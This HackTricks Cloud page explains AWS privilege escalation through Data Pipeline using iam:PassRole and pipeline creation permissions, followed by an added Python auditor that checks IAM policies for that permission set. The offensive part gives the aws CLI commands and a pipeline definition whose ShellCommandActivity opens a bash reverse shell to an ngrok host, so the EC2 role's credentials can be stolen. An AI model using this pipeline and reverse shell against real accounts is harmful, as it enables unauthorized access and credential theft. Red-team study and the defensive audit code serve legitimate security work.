AWS - Datapipeline Privesc
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
datapipeline
For more information about datapipeline, check:
AWS - DataPipeline, CodePipeline & CodeCommit Enum
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Users with these permissions can escalate privileges by creating a Data Pipeline that executes arbitrary commands using the permissions of the assigned role:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
After creating the pipeline, the attacker updates its definition to dictate specific actions or resource creations:
{
  "objects": [
    {
      "id": "CreateDirectory",
      "type": "ShellCommandActivity",
      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
      "runsOn": { "ref": "instance" }
    },
    {
      "id": "Default",
      "scheduleType": "ondemand",
      "failureAndRerunMode": "CASCADE",
      "name": "Default",
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_datapipeline"
    },
    {
      "id": "instance",
      "name": "instance",
      "type": "Ec2Resource",
      "actionOnTaskFailure": "terminate",
      "actionOnResourceFailure": "retryAll",
      "maximumRetries": "1",
      "instanceType": "t2.micro",
      "securityGroups": ["default"],
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_ec2_profile_instance"
    }
  ]
}
Note
Note that the role in lines 14, 15 and 27 needs to be a role assumable by datapipeline.amazonaws.com, and the role in line 28 needs to be a role assumable by ec2.amazonaws.com with an EC2 instance profile.
Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
The pipeline definition file, crafted by the attacker, contains directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
Potential Impact: Direct privesc to the ec2 service role specified.
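For reviewing who holds this permission set, the following is an added example (not part of the original page or of HackTricks tooling) that checks a principal's IAM policy documents for the four permissions in this section's heading, including wildcard grants, and reports which resources `iam:PassRole` is scoped to. It assumes the policy JSON has already been exported; the sample policies are constructed, and the check looks only at Allow statements (it ignores Deny, NotAction, Condition, permission boundaries and SCPs).

```python
import fnmatch

# The four permissions this page lists as sufficient for the escalation.
REQUIRED = ("iam:PassRole", "datapipeline:CreatePipeline",
            "datapipeline:PutPipelineDefinition", "datapipeline:ActivatePipeline")

def _as_list(value):
    """IAM accepts either a single string or a list for Action/Resource."""
    return [value] if isinstance(value, str) else list(value or [])

def allow_grants(policy):
    """Yield (lower-cased action pattern, resources) for each Allow statement."""
    stmts = policy.get("Statement", [])
    for stmt in ([stmts] if isinstance(stmts, dict) else stmts):
        if stmt.get("Effect") == "Allow":
            for pattern in _as_list(stmt.get("Action")):
                yield pattern.lower(), _as_list(stmt.get("Resource"))

def audit(policies):
    """Return (required actions not granted, resources iam:PassRole applies to)."""
    granted = {}
    for policy in policies:
        for pattern, resources in allow_grants(policy):
            for action in REQUIRED:
                # IAM action names are case-insensitive and may use * and ?.
                if fnmatch.fnmatchcase(action.lower(), pattern):
                    granted.setdefault(action, set()).update(resources)
    missing = [a for a in REQUIRED if a not in granted]
    return missing, sorted(granted.get("iam:PassRole", ()))

# Constructed sample policies (not taken from any real account).
RISKY = [{"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "datapipeline:*", "Resource": "*"},
    {"Effect": "Allow", "Action": ["iam:PassRole"], "Resource": "*"},
]}]
SCOPED = [{"Version": "2012-10-17", "Statement": {
    "Effect": "Allow", "Resource": "*",
    "Action": ["datapipeline:CreatePipeline", "datapipeline:PutPipelineDefinition"],
}}]

if __name__ == "__main__":
    for name, pols in (("RISKY", RISKY), ("SCOPED", SCOPED)):
        missing, roles = audit(pols)
        status = "full permission set present" if not missing else f"missing {missing}"
        print(f"{name}: {status}; PassRole resources: {roles}")
```

An empty `missing` list means the principal holds the complete set; a `PassRole` resource of `*` is the case to tighten first, by restricting it to the specific role ARNs the pipelines legitimately need.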

